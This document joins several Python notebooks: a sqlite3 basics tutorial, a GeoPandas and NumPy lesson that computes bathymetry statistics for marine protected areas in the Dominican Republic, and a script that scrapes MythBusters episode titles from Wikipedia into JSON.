connection.commit()
# Close the connection to the database
connection.close()
# -
# Example demonstrating the use of executemany().
import sqlite3
conn = sqlite3.connect('library.db')
cursor = conn.cursor()
cursor.execute(
"""CREATE TABLE booksSS(
title,
author,
published);
""")
li = [['A', 'B', 2013], ['C', 'D', 2014], ['E', 'F', 2015]]
conn.executemany("""
INSERT INTO
booksSS(title, author, published)
VALUES (?, ?, ?)""", li)
sql = """
SELECT * FROM booksSS;"""
cursor.execute(sql)
result = cursor.fetchall()
for _ in result:
print(_)
conn.commit()
conn.close()
# Example combining single inserts and executemany().
import sqlite3
conn = sqlite3.connect('Company.db')
cursor = conn.cursor()
sql = """CREATE TABLE employeeee(
id INTEGER PRIMARY KEY,
firstname VARCHAR(30),
lastname VARCHAR(20),
gender CHAR(1),
dob DATE)"""
cursor.execute(sql)
sql = """INSERT INTO employeeee VALUES('1', 'Virat', 'Kohli', 'M', '1989-11-5')"""
cursor.execute(sql)
li = [['3', 'Kane', 'Williamson', 'M', '1986-4-4'],
['2', 'ABde', 'Villiares', 'M', '1985-17-2'],
['4', 'MS', 'Dhoni', 'M', '1981-7-7']]
conn.executemany(
"""INSERT INTO employeeee VALUES (?, ?, ?, ?, ?)""", li)
print('method-1\n')
for _ in conn.execute('SELECT * FROM employeeee ORDER BY ID'):
print(_)
print('method-2\n')
sql = """SELECT * FROM employeeee ORDER BY ID"""
cursor.execute(sql)
ans = cursor.fetchall()
for i in ans:
print(i)
conn.commit()
conn.close()
# # Inserting Variables into a Database Table using SQL.
# __Steps to create a table and insert variables into the database__
# Example of creating a database.
import sqlite3
conn = sqlite3.connect('pythonDB.db')
cursor = conn.cursor()
def create_table():
cursor.execute('CREATE TABLE IF NOT EXISTS RecordONE (Number REAL, Name TEXT)')
def data_entry():
number = 1234
name = 'VK'
cursor.execute('INSERT INTO RecordONE (Number, Name) VALUES(?, ?)',(number, name))
conn.commit()
create_table()
data_entry()
cursor.close()
conn.close()
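# + [markdown]
# If you set the connection's `row_factory` to `sqlite3.Row`, fetched rows support access by column name as well as by position, which makes code like `data_entry` easier to read back. A sketch reusing the `RecordONE` table:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.row_factory = sqlite3.Row      # rows now behave like lightweight mappings
cursor = conn.cursor()
cursor.execute("CREATE TABLE RecordONE (Number REAL, Name TEXT)")
cursor.execute("INSERT INTO RecordONE (Number, Name) VALUES (?, ?)", (1234, "VK"))

row = cursor.execute("SELECT * FROM RecordONE").fetchone()
print(row["Name"], row["Number"])   # VK 1234.0 (REAL affinity stores the int as float)
conn.close()
```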
|
SQL with python(Basics).ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# + [markdown] id="S6xi1qinKvA_" colab_type="text"
# ## Session Prep
# + [markdown] id="gSddwN1KC74U" colab_type="text"
# 1. Run the cell below to install two libraries we'll be using to look at geospatial data: GeoPandas and OpticalRS.
# 2. Visit the [Github repo](https://github.com/rrcarlson/Intro_python_geo) and download/clone the files in the Data folder (shapefiles and raster).
# + id="zP7vdH0AK0W3" colab_type="code" colab={}
#@title
# Install OpticalRS. This also installs GeoPandas because GeoPandas is a dependency of OpticalRS
# !apt-get install software-properties-common python-software-properties > /dev/null
# !add-apt-repository ppa:ubuntugis/ppa -y > /dev/null
# !apt-get update > /dev/null
# !apt-get install -y --fix-missing python-gdal gdal-bin libgdal-dev > /dev/null
# !pip2 install OpticalRS > /dev/null
# + [markdown] id="Fl40H7od1mK4" colab_type="text"
# # Intro to Python
# + [markdown] id="cGa0avMm1mK5" colab_type="text"
# 
#
# Python is a rich, versatile language with lots of prolific contributors. So where to start?
#
# For reference, below are some Python tutorials that cover a range of Python libraries. We won't spend too much time today on basic syntax, etc., since that's well covered elsewhere and kinda boring. As a Python newbie, I've found that using Pandas/GeoPandas and NumPy have introduced me organically to other libraries, and have allowed me to see results quickly for basic geospatial tasks--so we'll start there!
# * [Python basics](https://github.com/sinkovit/PythonSeries/blob/master/Python%20basics.ipynb): How to create lists, dictionaries, iterators, etc.
# * [Python Markdown and LaTex](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet): Documentation and formatting
# * Matplotlib: Data visualization
# * [Pandas](https://pandas.pydata.org/pandas-docs/stable/10min.html): Data wrangling and preparation using two types of data objects: 1) DataFrames, 2) Series.
# * [GeoPandas](https://automating-gis-processes.github.io/2016/Lesson2-overview-pandas-geopandas.html): Basically the geospatial version of Pandas. Adds geospatial functionality to the DataFrame (Geo + DataFrame = GeoDataFrame).
# * [NumPy](https://www.datacamp.com/community/tutorials/python-numpy-tutorial): Multi-dimensional data arrays for manipulating large datasets. There are some functions for linear algebra and statistics within NumPy but it's also used by SciPy, matplotlib, and pandas for scientific computing.
# * [SciPy](http://www.randalolson.com/2012/08/06/statistical-analysis-made-easy-in-python/): Scientific computing and statistical analysis. Uses NumPy, Matplotlib, and Pandas, and is common in earth sciences, astronomy, and oceanography.
# * [Shapely](http://toblerity.org/shapely/manual.html): Spatial data model for planar features (points, curves, and surfaces).
# * Skikit-learn: regression, clustering, and classification algorithms
# * Various [cool tricks](https://community.modeanalytics.com/python/)
# + [markdown] id="kH0cCmSd1mK5" colab_type="text"
# # Conservation in the Dominican Republic
# + [markdown] id="vTbdGoGL1mK6" colab_type="text"
# 
#
# In this tutorial, we'll be testing out two Python libraries, **GeoPandas** and **NumPy**, that are useful in GIS. Our objectives: to filter and analyze vector and raster data for conservation areas in the Dominican Republic.
#
# We'll use two datasets:
# * **Conservation Areas of the Dominican Republic**: Vector data delineating conservation area boundaries, from the [World Database of Protected Areas (WDPA)](https://www.iucn.org/theme/protected-areas/our-work/world-database-protected-areas).
# * **Gridded Bathymetric Data**: Raster data (30 arc-second resolution) on bathymetry from the [British Oceanographic Data Center](https://www.bodc.ac.uk/).
#
# Our goals are:
# * **Filter the WDPA database** to find only conservation areas for the marine environment (Marine Protected Areas)
# * **Clip rasters** to MPA boundaries
# * **Analyze raster data** (bathymetry) within Marine Protected Area boundaries to find
# * Mean depth per MPA
# * Standard deviation of depth per MPA
# * Range of depth per MPA
# + [markdown] id="OG90pHk51mK6" colab_type="text"
# # Step 1: Load your libraries
# + [markdown] id="uU77Mqop1mK7" colab_type="text"
# What modules do we need?
# * Vector data comes in a tabular format, with one geometric feature per row. So we need a library to organize geographic data in a DataFrame.
# **That's Pandas** (more specifically, **GeoPandas**).
# * Raster data is a little trickier. It comes to us in a grid of pixel values, sometimes in multiple bands (3+ dimensions). We need a library to organize arrays/matrices of values in *n* dimensions. **That's NumPy**.
# * Numpy isn't explicitly designed to handle raster data. We need the help of another library to convert our raster files into array format. **That's [OpticalRS](https://github.com/jkibele/OpticalRS)**, created by NCEAS' very own <NAME>! OpticalRS borrows a bit of code from [an old version of rasterstats](https://github.com/perrygeo/python-rasterstats/releases/tag/0.5) to do the actual raster subsetting.
# * We'll want to plot stuff, so we need a library for data visualization. That's **matplotlib**.
#
# 
# + id="20rpNBAb1mK8" colab_type="code" colab={}
import geopandas as gpd
import pandas as pd
import numpy as np
import matplotlib
from OpticalRS import *
# + [markdown] id="8J29u-kf1mK_" colab_type="text"
# # Step 2: Prep your vector data
# + [markdown] id="nJRFiGhI1mK_" colab_type="text"
# ## Step 2.1 Read in your vector data: GeoPandas
# + [markdown] id="nyCloPks1mLA" colab_type="text"
# Reading in tabular data is pretty simple. Just remember:
# * DataFrame = Pandas = `pd.read_csv()`
# * GeoDataFrame = DataFrame with geometry attribute = GeoPandas = `gpd.read_file()`
# + id="ytyKh93J4cR3" colab_type="code" colab={}
# Loading my local files into Colaboratory
from google.colab import files
uploaded = files.upload()
# + id="6lZggwYl1mLB" colab_type="code" colab={}
# Define your vector filepath
conserve_fp = "WDPA_polygons.shp"
# Read vector data in as GeoDataFrame
conserve = gpd.read_file(conserve_fp)
# + [markdown] id="qiWCmE0T1mLD" colab_type="text"
# Our first preprocessing step is to check on the data's projection. Projections can be tricky and I'm not going to delve too far into this topic here, but below are some basic steps for identifying and changing your data's projection (more details can be found [here](http://geopandas.org/projections.html)).
# + id="D3IQ6kAJ1mLD" colab_type="code" colab={}
# Check the Coordinate Reference System (CRS)
conserve.crs
# + id="j8m5oyP-1mLL" colab_type="code" colab={}
# Change your CRS, for fun. Then change it back (because we like EPSG = 4326).
conserve = conserve.to_crs(epsg=3857)
conserve = conserve.to_crs(epsg=4326)
# + [markdown] id="F82jApzI1mLO" colab_type="text"
# ### Exercise 2.1
# + id="4luBoD9C1mLO" colab_type="code" colab={}
# Read in your WDPA shapefile as a GeoDataFrame.
# Check the projection of your data.
# + [markdown] id="fD5yzPop1mLQ" colab_type="text"
# ## Step 2.2 Explore your vector data: GeoPandas
# + [markdown] id="sn6Xos8T1mLS" colab_type="text"
# We can use some basic exploratory functions in GeoPandas to query our data.
# + id="WKdLg7jhjAbU" colab_type="code" colab={}
# Look at the first few features in our attribute table
conserve.head()
# + id="zeCs2GRG1mLT" colab_type="code" colab={}
# Look at all of the attributes in your dataset
conserve.info()
# + [markdown] id="tkiCTJZf1mLX" colab_type="text"
# There are 143 data objects with 29 attributes, of various data types (object, float, integer). In the pandas world, data types break down like this:
# * dtype('O') = object = can include string and other geopandas object types
# * dtype('int64') = integer
# * dtype('float64') = float
# + id="u3qTTUvU1mLY" colab_type="code" colab={}
# What is the total conserved area in the DR? Conserved area = "GIS_AREA" (we'll discuss how to use the inherent geometry of the GeoDataFrame to do this later).
area_sum = conserve.GIS_AREA.sum()
area_sum
# + id="GNZyFN0X1mLc" colab_type="code" colab={}
# What is the largest area conserved?
area_max = conserve.GIS_AREA.max()
area_max
# + id="EhTlDpWb1mLf" colab_type="code" colab={}
# What is the smallest area conserved?
area_min = conserve.GIS_AREA.min()
area_min
# + id="eWbK-61m1mLj" colab_type="code" colab={}
# What are the unique values for the "MARINE" attribute?
conserve['MARINE'].unique()
# + id="FqKSPaqu1mLn" colab_type="code" colab={}
# How many different areas are "Marine" (2), "Terrestrial" (0), or both (1)?
type_park = conserve['MARINE'].value_counts()
type_park
# + id="DzWE-9Ky1mLq" colab_type="code" colab={}
# Write all of this info into a string
"The total conserved area is {} square kilometers and there are {} MPAs, {} terrestrial areas, and {} mixed areas".format(area_sum, type_park["2"], type_park["0"], type_park["1"])
# + [markdown] id="9zV-u_cC1mLs" colab_type="text"
# ### Exercise 2.2
# + id="EyfTJmGV1mLt" colab_type="code" colab={}
# What are the options for park designation in English ("DESIG_ENG")?
# + id="sK7E6rjZ1mLv" colab_type="code" colab={}
# How many different areas are designated as "Wildlife Refuge"?
# + [markdown] id="o2QqMb171mLz" colab_type="text"
# For a complete list of methods available for exploring GeoDataFrames, see [here](https://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.html).
# + [markdown] id="qjl7rkUL1mL0" colab_type="text"
# ## Step 2.3 Plot your vector data: GeoPandas
# + [markdown] id="-4UoYzZn1mL0" colab_type="text"
# GeoPandas offers some basic plotting methods for quick visualization. You can create more advanced plots (with customizable layering, formatting) using the Matplotlib library. Matplotlib can be a bit confusing at first, so here's a [great tutorial](https://github.com/matplotlib/AnatomyOfMatplotlib/blob/master/AnatomyOfMatplotlib-Part1-Figures_Subplots_and_layouts.ipynb) if you want to learn more. As in R, you can also create interactive maps through [Leaflet](https://automating-gis-processes.github.io/2016/Lesson5-interactive-map-folium.html) and [Bokeh](https://automating-gis-processes.github.io/2016/Lesson5-interactive-map-bokeh.html).
# + id="gSHZDyO81mL1" colab_type="code" colab={}
# Plot conservation areas
conserve.plot()
# + id="nQGfTSlV1mL3" colab_type="code" colab={}
# Plot conservation areas as choropleth by park type
conserve.plot(column = "DESIG_ENG", cmap = "Paired")
# + id="G6nX3UmE1mL5" colab_type="code" colab={}
# Make it red! Color palettes: https://matplotlib.org/users/colormaps.html
conserve.plot(column = "DESIG_ENG", cmap = "hot")
# + id="itP1yj0r1mL7" colab_type="code" colab={}
# Plot conservation areas where the area has a Use Management Plan.
conserve[conserve['MANG_PLAN'] != "No"].plot()
# + [markdown] id="wz7HOiZP1mL_" colab_type="text"
# ### Exercise 2.3
# + id="9g8pH6vZ1mL_" colab_type="code" colab={}
# Plot conservation areas as a choropleth by the "MARINE" attribute
conserve.plot(column = "MARINE")
# + id="_HjXmxEf1mMB" colab_type="code" colab={}
# Make it blue (obviously)! https://matplotlib.org/users/colormaps.html
conserve.plot(column = 'MARINE', cmap="Blues")
# + [markdown] id="DVjnH-z71mMD" colab_type="text"
# ## Step 2.4 Filter your vector data: GeoPandas
# + [markdown] id="sToRQcBk1mME" colab_type="text"
# **Looking above at our "To Do" list, our first task was this:** "Filter the WDPA database to find only conservation areas for the marine environment (Marine Protected Areas)."
#
# In R-speak, we're using Python to `dplyr::filter`. To subset data in Python, we use the `loc` and `iloc` indexing tools. Documentation can be found [here](http://pandas.pydata.org/pandas-docs/version/0.17/indexing.html) under "Indexing and Selecting Data" (basically the Python version of R's Data Wrangling cheat sheet).
#
# The basics are this:
# * `iloc` selects data on a known index (integer value). Example: `iris.iloc[7]` would select the 8th row of data.
# * `loc` selects data on a known label. Example: `iris.loc[iris['sepal_length'] > 7]` selects data with sepal length over 7 centimeters.
#
# Let's try it out:
# + id="RAWvIK6O1mME" colab_type="code" colab={}
# Take a look at our first few lines of data
conserve.head(3)
# + id="U2j4WUyq1mMH" colab_type="code" colab={}
# Select rows 0 through 2 and the fourth column (index 3)
conserve.iloc[0:3, 3]
# + id="11muwsJe1mMJ" colab_type="code" colab={}
# Select index value 3 THROUGH 6 for name and metadata ID
conserve.loc[3:6, ['NAME','METADATAID']]
# + id="5Say35Et1mMK" colab_type="code" colab={}
# Select indices 3 AND 6 for name and metadata ID
conserve.loc[[3,6], ['NAME','METADATAID']]
# + id="2UxUi_fA1mMN" colab_type="code" colab={}
# Filter DataFrame for only those areas with the name "Jaragua"
conserve.loc[conserve['NAME'] == "Jaragua"]
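# + [markdown]
# The same indexing works on any DataFrame. A self-contained toy example (plain pandas, no shapefile needed; the rows are made-up stand-ins for the WDPA data):

```python
import pandas as pd

df = pd.DataFrame({
    "NAME":   ["Jaragua", "Montecristi", "La Caleta"],
    "MARINE": ["1", "0", "2"],
})

# iloc: position-based selection (rows 0-1 of the first column)
print(df.iloc[0:2, 0].tolist())                        # ['Jaragua', 'Montecristi']

# loc: label/boolean-based selection, like the 'Jaragua' filter above
print(df.loc[df["MARINE"] == "2", "NAME"].tolist())    # ['La Caleta']
```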
# + [markdown] id="tjw_VO0H1mMO" colab_type="text"
# The WDPA Data Dictionary explains that Marine Protected Areas are coded by the ordinal `MARINE` attribute, defined as follows:
# * 0 = 100% terrestrial PA
# * 1 = Coastal: marine and terrestrial PA
# * 2 = 100% marine PA
#
# Let's subset our data by *only* those rows that represent 100% MPAs.
# + id="gRHgeUtc1mMP" colab_type="code" colab={}
# Select only 100% marine protected areas
mpa = conserve.loc[conserve['MARINE'] == '2']
len(mpa)
# + id="0IduLWU-1mMR" colab_type="code" colab={}
mpa[['MARINE', 'NAME']]
# + [markdown] id="5b6roE2-1mMT" colab_type="text"
# Our resulting DataFrame contains vector data for 7 MPAs in the Dominican Republic.
# + [markdown] id="WsT9hcld1mMT" colab_type="text"
# ## Before we move on...
# + [markdown] id="5ioV6gzT1mMT" colab_type="text"
# **Can you "pipe" in Python?** Yes and no. You won't see any "%>%" business in Python, but Python syntax allows you to string together multiple operations. The Python mantra is that "everything is an object", meaning everything (strings, dataframes, lists, functions, even modules) can be assigned to a variable or passed as an argument to a function.
#
# Confusing? Take a look at our code above. We're running multiple operations through our "conserve" geodataframe, like: 1) reprojecting it, 2) filtering it, and 3) plotting it. In R, "piping" might look something like:
# + [markdown] id="aw07fuqg1mMU" colab_type="text"
# `conserve %>%`
# > `st_transform(4326) %>%`
#
# > `dplyr::filter(MARINE == "2") %>%`
#
# > `dplyr::select(MARINE, NAME, geometry) %>%`
#
# > `plot()`
#
#
# In Python, "piping" works out like this:
#
#
# `conserve.to_crs(epsg=4326).loc[conserve['MARINE']=='2'][['MARINE','NAME','geometry']].plot()`
#
#
# Since "everything is an object" in Python, the result of each operation can be worked on by subsequent methods. You can see that this line of code simply combines the functions we used in Step 2.2. Let's see if it works.
# + id="KruGAyTGwEGj" colab_type="code" colab={}
conserve.to_crs(epsg=4326).loc[conserve['MARINE'] == '2'][['MARINE','GIS_AREA','geometry']].plot()
# + [markdown] id="xtKTG_Jd1mMZ" colab_type="text"
# Woohoo!
# + [markdown] id="wOsgN1Ju1mMa" colab_type="text"
# ## Also before we move on...
# + [markdown] id="Bc1bG_f61mMa" colab_type="text"
# **You can also perform all kinds of operations using the 'geometry' column (every GeoDataFrame has one).**
# Above, we used the dataset's "GIS_AREA" attribute to run summary statistics. This is because the WDPA dataset uses its own methodology and decision factors for calculating polygon areas. Most datasets won't be this finicky.
#
# The "geometry" column contains a Shapely geometry object (point, polygon, multi-point, multi-polygon, etc.) and is usually automatically detected when GeoPandas reads in your shapefile. But be careful! The geometry column won't always be called "geometry". Use the "name" method to double check. If GeoPandas chooses the wrong column for geometry, use the `set_geometry` method to specify which column to use.
# + id="OLmolzi21mMa" colab_type="code" colab={}
# Call your geometry attribute and find its Shapely geometry type
conserve.geometry.head()
# + id="5ulFxqi91mMf" colab_type="code" colab={}
# Check which column GeoPandas has chosen as the "geometry" attribute
conserve.geometry.name
# + id="cpqmpSog1mMh" colab_type="code" colab={}
# Change if necessary (not necessary in our case, so this code is redundant)
conserve.set_geometry("geometry")
conserve.geometry.name
# + [markdown] id="RxfEIGLS1mMl" colab_type="text"
# # Step 3: Prep your raster data
# + [markdown] id="y3_7oebp1mMl" colab_type="text"
# ## Step 3.1 Read in your raster data: Numpy and OpticalRS
# + [markdown] id="R2G2-U-T1mMm" colab_type="text"
# **Let's turn our attention to our raster data.** One of my favorite parts of Python is its ability to manipulate raster data. By turning a raster into an object called a NumPy array, you can directly access the matrix of values within raster pixels, analyzing and filtering raster data in [all kinds of ways](https://docs.scipy.org/doc/numpy/user/quickstart.html) within the expansive SciPy library. Arrays are also compatible with GeoPandas, so you don't have to worry about converting your vector data into SpatialPolygonsDataFrames (or whatever) to play well with rasters.
#
# To turn our raster file into a numpy array, we'll use a library called OpticalRS by <NAME> found [here](https://github.com/jkibele/OpticalRS).
# + id="rjTmVRzm1mMm" colab_type="code" colab={}
# %pylab inline
from OpticalRS import *
# + [markdown] id="dlqhKmME1mMo" colab_type="text"
# Our first step is to read our raster file into OpticalRS. The `RasterDS()` function reads in a file and converts it into a raster-specific object called a 'Raster Dataset'. The `band_array` attribute of the 'Raster Dataset' is a NumPy array of your data.
# + id="cWwbZMbFWV4y" colab_type="code" colab={}
# Loading my local files into Colaboratory
from google.colab import files
uploaded = files.upload()
# + id="vQ65aL9w1mMp" colab_type="code" colab={}
# Define your GeoTiff filepath
bathy_dr_fp = "bathy_caribb_4326.tif"
# Turn your GeoTiff into a "Raster Dataset" object.
rds = RasterDS(bathy_dr_fp)
# Convert the "Raster Dataset" object into a numpy array
dominican_arr = rds.band_array
# + [markdown] id="y4svnLWkB9mN" colab_type="text"
# If you have lots of rasters to read in at once, define your root directory and run a loop through it
# ```
# in_data_dir = "/home/carlson/tutorial_files/"
# filenames = []
# for p in os.listdir(in_data_dir):
# if p.endswith('.tif'):
# fp = os.path.join(in_data_dir, p)
# filenames.append(fp)
# ```
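# + [markdown]
# A runnable version of the same pattern, using a temporary directory from the standard library (the `.tif` file names here are made up for the demo):

```python
import os
import tempfile

with tempfile.TemporaryDirectory() as in_data_dir:
    # Create a few dummy files to scan
    for name in ["a.tif", "b.tif", "notes.txt"]:
        open(os.path.join(in_data_dir, name), "w").close()

    # Collect full paths of every .tif in the directory
    filenames = []
    for p in sorted(os.listdir(in_data_dir)):
        if p.endswith(".tif"):
            filenames.append(os.path.join(in_data_dir, p))

    found = [os.path.basename(fp) for fp in filenames]
    print(found)    # ['a.tif', 'b.tif']
```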
# + [markdown] id="xEWJnqQ01mMq" colab_type="text"
# Let's check out the properties of our array and make sure the conversion worked
# + id="oCdZ-e3s1mMs" colab_type="code" colab={}
# Check array shape
dominican_arr.shape
# + id="Q7qjBg3J1mMw" colab_type="code" colab={}
# Find mean depth (pixel value) in your raster
dominican_arr.mean()
# + id="PwPeoMPd1mMy" colab_type="code" colab={}
# Check size of array
dominican_arr.nbytes
# + id="pxNxhMMk1mM0" colab_type="code" colab={}
# Create a quick plot
imshow(dominican_arr.squeeze(), cmap ='viridis')
# + [markdown] id="bf8ph22Q1mM6" colab_type="text"
# Looks good!
# + [markdown] id="sASK8U2F1mM6" colab_type="text"
# ### Exercise 3.1
# + id="8YDqXNVC1mM7" colab_type="code" colab={}
# Follow the steps to load in your raster data as a NumPy array.
# + id="F5crs_mS1mM8" colab_type="code" colab={}
# Find the max bathymetry value in your array (use NumPy documentation: https://docs.scipy.org/doc/numpy-1.13.0/reference/routines.statistics.html)
# + [markdown] id="jz6X2zRk1mM9" colab_type="text"
# # Step 4: Analyze bathymetry by MPA ("Zonal Statistics")
# + [markdown] id="ZNBgWire1mM9" colab_type="text"
# ## Step 4.1 Apply bathymetry to one "zone"
# + [markdown] id="O46Q6P901mM-" colab_type="text"
# Running statistics on our array/raster is easy, but not terribly meaningful because my bounding box is pretty arbitrary. We need to clip our raster to MPAs in order to assess the bathymetry values within our "zones" of interest. This is called "zonal statistics" (aka "cookie cutter statistics").
# + [markdown] id="KcEsFu561mM-" colab_type="text"
# 
#
# Let's start by clipping our "Raster Dataset" object to MPA geometries. This is easy in OpticalRS using the `geometry_subset()` function. `geometry_subset` takes a geometry object (like the 'geometry' attribute of a GeoDataFrame row) and uses it as a bounding box (box-ish) for our "Raster Dataset", returning a NumPy array.
#
# Since `geometry_subset` takes just one geometry, we'll
# 1. Dissolve all parks designated as "Marine" into one geometry.
# 2. Use this geometry as the "cookie cutter" for our raster.
# + id="lUviGUg71mM_" colab_type="code" colab={}
# Create one geometry for ALL marine protected areas (Remember: MPAs are coded as '2')
mpas_dissolved = conserve.dissolve(by='MARINE').loc['2']
# Clip your array to the shape of MPAs (dissolved)
mpa_array = rds.geometry_subset(mpas_dissolved.geometry)
# Plot the clipped array
imshow(mpa_array.squeeze())
# + [markdown] id="h12Zw8bo1mNB" colab_type="text"
# Great! Now we have an array of bathymetry values clipped to MPA boundaries. We can use [any statistical methods](https://docs.scipy.org/doc/numpy-1.14.0/reference/index.html) available within NumPy on this array.
# + id="ReS6UPC31mNB" colab_type="code" colab={}
# Find the mean, min, max, and range of bathymetry values for MPAs.
[mpa_array.mean(), mpa_array.min(), mpa_array.max(), mpa_array.ptp()]
# + [markdown] id="whvlEFrB1mND" colab_type="text"
# Let's tighten this up by placing these commands in a single function. **Note:** There are lots of preexisting functions for doing "Raster Stats" in Python and R, but they're prescriptive in the types of statistics they return. By converting your raster into an array, you can apply anything in the **NumPy** universe to your data!
# + id="q9kdCevE1mNE" colab_type="code" colab={}
# Define a function encompassing all of the commands above.
# Clip Raster Dataset to vector object g.
# Find mean, min, max, and range values of clipped numpy array.
# Fetch the MPA ID from "g" and place alongside summary statistics.
def stats_bathy(g, rds):
mpa_arr = rds.geometry_subset(g.geometry)
mean_bathy = mpa_arr.mean()
min_bathy = mpa_arr.min()
max_bathy = mpa_arr.max()
range_bathy = mpa_arr.ptp()
mpa_id = g['WDPA_PID']
return mpa_id, mean_bathy, min_bathy, max_bathy, range_bathy
# + id="jlfa_gQ81mNG" colab_type="code" colab={}
# Try the function on g = mpas_dissolved
stats_bathy(mpas_dissolved, rds)
# + [markdown] id="FJJ5bLgB1mNI" colab_type="text"
# ### Exercise 4.1
# + id="lZ9QyjD31mNI" colab_type="code" colab={}
# Follow the steps above to clip your raster data to MPA boundaries.
# + id="Te55IqNS1mNL" colab_type="code" colab={}
# Define a new function calculating the standard deviation and coefficient of variation of MPA geometries
# + [markdown] id="G48ciIuA1mNM" colab_type="text"
# ## Step 4.2: Apply bathymetry to many "zones"
# + [markdown] id="yVfFHRpz1mNM" colab_type="text"
# Now that our personal "Raster Stats" are bundled neatly in one function, we can iterate through multiple geometries, for example, each individual MPA (undissolved). The easiest way to do this is to use `apply`, which operates like `apply` in R. Our steps are:
#
# * Create an anonymous function using `lambda` and run each geometry (row) in our DataFrame through that function.
# * `apply` essentially **passes each row of our DataFrame** in as the `g` argument of `stats_bathy(g, rds)`
# + id="qhATIhvN1mNN" colab_type="code" colab={}
# Define a new function that uses 'lambda' to iterate stats_bathy through multiple DataFrame rows (MPA geometries).
def stats_bathy_multiple(dataframe, rds):
series_mpas = dataframe.apply(lambda g: stats_bathy(g, rds), axis=1)
return series_mpas
# + id="Pg1TH5JQ1mNP" colab_type="code" colab={}
# Try out the function on our original 'mpa' GeoDataFrame
series_mpas = stats_bathy_multiple(mpa, rds)
series_mpas
# + [markdown] id="X-Eewgcc1mNQ" colab_type="text"
# We now have summary statistics for all MPAs in our `mpa` dataset!
# + [markdown] id="hftFLbOL1mNQ" colab_type="text"
# ## Extra steps
# + [markdown] id="7vPPh_GD1mNQ" colab_type="text"
# The data above isn't in the most usable format. Our function returns a Series of tuples, with each tuple representing a different MPA geometry.
#
# To get all of this back into a DataFrame, I can split each tuple into separate values (columns). There are several ways to do this, but one easy method is NumPy's `vstack()`, which stacks a sequence of array-likes (here, our tuples) on top of each other to form a 2-D array. I can then pass that array to the DataFrame constructor.
# + id="Cdy1gDr01mNR" colab_type="code" colab={}
# Convert your series of tuples into a DataFrame using 'vstack'
dataframe_mpas = pd.DataFrame(np.vstack(series_mpas))
dataframe_mpas
# + id="Ckax55Fx1mNS" colab_type="code" colab={}
# Rename the columns of your DataFrame
dataframe_mpas = dataframe_mpas.rename(columns = {0:'WDPA_PID', 1:'mean_bathy', 2: 'min_bathy', 3: 'max_bathy', 4: 'range_bathy'})
dataframe_mpas
# + [markdown] id="Snkb6CRB1mNU" colab_type="text"
# I can then save this data back out to a CSV. Saving tabular data is as simple as:
# * DataFrame = Pandas = `pd.read_csv()` to load, `DataFrame.to_csv()` to save
# * GeoDataFrame = DataFrame with a geometry attribute = GeoPandas = `gpd.read_file()` to load, `GeoDataFrame.to_file()` to save
# + id="dThxTHuQ1mNV" colab_type="code" colab={}
# Save DataFrame to CSV
dataframe_mpas.to_csv("python_ecodatascience.csv")
# + [markdown] id="Y5XjVgVU1mNV" colab_type="text"
# # Step 5: Review
# + [markdown] id="U9jteQ171mNX" colab_type="text"
# * **Use Pandas to manage and clean tabular data in a DataFrame**
# * Use `loc` and `iloc` to index/subset data in a DataFrame.
# * Remember to check `dtype`
# * **Use GeoPandas** to do the same for geodata
# * **NumPy is useful for managing data in arrays**, particularly if your data has over 2 dimensions.
# * A few tips for **iterating through DataFrames**:
# * There are many iterative tools in Python. We used `apply` to iterate through GeoDataFrame rows (geometries) using axis=1 (we could also iterate through columns using axis=0). Other important iterative tools that we didn't discuss are [loops](https://www.digitalocean.com/community/tutorials/how-to-construct-for-loops-in-python-3) and [list comprehensions](https://www.datacamp.com/community/tutorials/python-list-comprehension).
# * Data Structures in Python come in [many shapes and sizes](https://pandas.pydata.org/pandas-docs/stable/dsintro.html). Arrange your data (whatever it may be) in the structure of your choosing by 1) reading the filepath into the desired library like GeoPandas or, 2) using your data as an argument in a Data Constructor.
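As a quick illustration of the second route above, here is a sketch (with hypothetical column names and values, not data from this tutorial) of building a DataFrame directly from a Python dictionary via the `pd.DataFrame` constructor:

```python
import pandas as pd

# Hypothetical MPA summary data fed straight into the DataFrame constructor
mpa_stats = pd.DataFrame(
    {"WDPA_PID": ["101", "102"], "mean_bathy": [-120.5, -43.2]}
)
print(mpa_stats["mean_bathy"].mean())  # -81.85
```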
|
copy notebooks/Copy of Intro_Python_geospatial.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import os
import re
import json
import pandas as pd
# -
WIKI_URL = r"https://en.wikipedia.org/wiki/List_of_MythBusters_episodes"
FILENAME = os.path.abspath("mythbusters.json")  # notebooks have no __file__; resolve relative to the working directory
def get_season(season_table, index):
season = season_table.loc[index]["Season"].values[1]
return f"{season} season"
def normalize(name):
name = name.lower()
name = name.replace(" / ", " ").replace("/", " ").replace(" - ", "-")
name = re.sub(r"[^-\w\s]", "", name)
name = name.replace(" ", "-")
return name
def process_table(df, season):
episodes = []
for index, row in df[::2].iterrows():
for name in re.findall(r"\"(.+?)\"", row["Title"]):
episodes.append(
{
"name": normalize(name),
"episode": row["No. in season"],
"season": season,
}
)
return episodes
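To make the regex and normalization steps concrete, here is a self-contained sketch on a hypothetical two-row table that mimics the Wikipedia layout (episode rows alternate with summary rows, hence `df[::2]`; the episode title is invented for illustration):

```python
import re
import pandas as pd

def normalize(name):
    # same normalization as above: lowercase, strip punctuation, hyphenate
    name = name.lower()
    name = name.replace(" / ", " ").replace("/", " ").replace(" - ", "-")
    name = re.sub(r"[^-\w\s]", "", name)
    return name.replace(" ", "-")

# Hypothetical table: every other row is a summary row, as on Wikipedia
df = pd.DataFrame({
    "Title": ['"Jet Assisted Chevy"', "summary text"],
    "No. in season": [1, 1],
})
episodes = [
    {"name": normalize(n), "episode": row["No. in season"]}
    for _, row in df[::2].iterrows()
    for n in re.findall(r"\"(.+?)\"", row["Title"])
]
print(episodes[0]["name"])  # jet-assisted-chevy
```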
tables = pd.read_html(WIKI_URL)  # returns a list of DataFrames, one per HTML table
len(tables)
results = []
for ind, table in enumerate(tables):
    if "Title" in table:
        season = get_season(tables[0], ind - 1)
        episodes = process_table(table, season)
        results.extend(episodes)
with open(FILENAME, "w") as f:
json.dump(results, f)
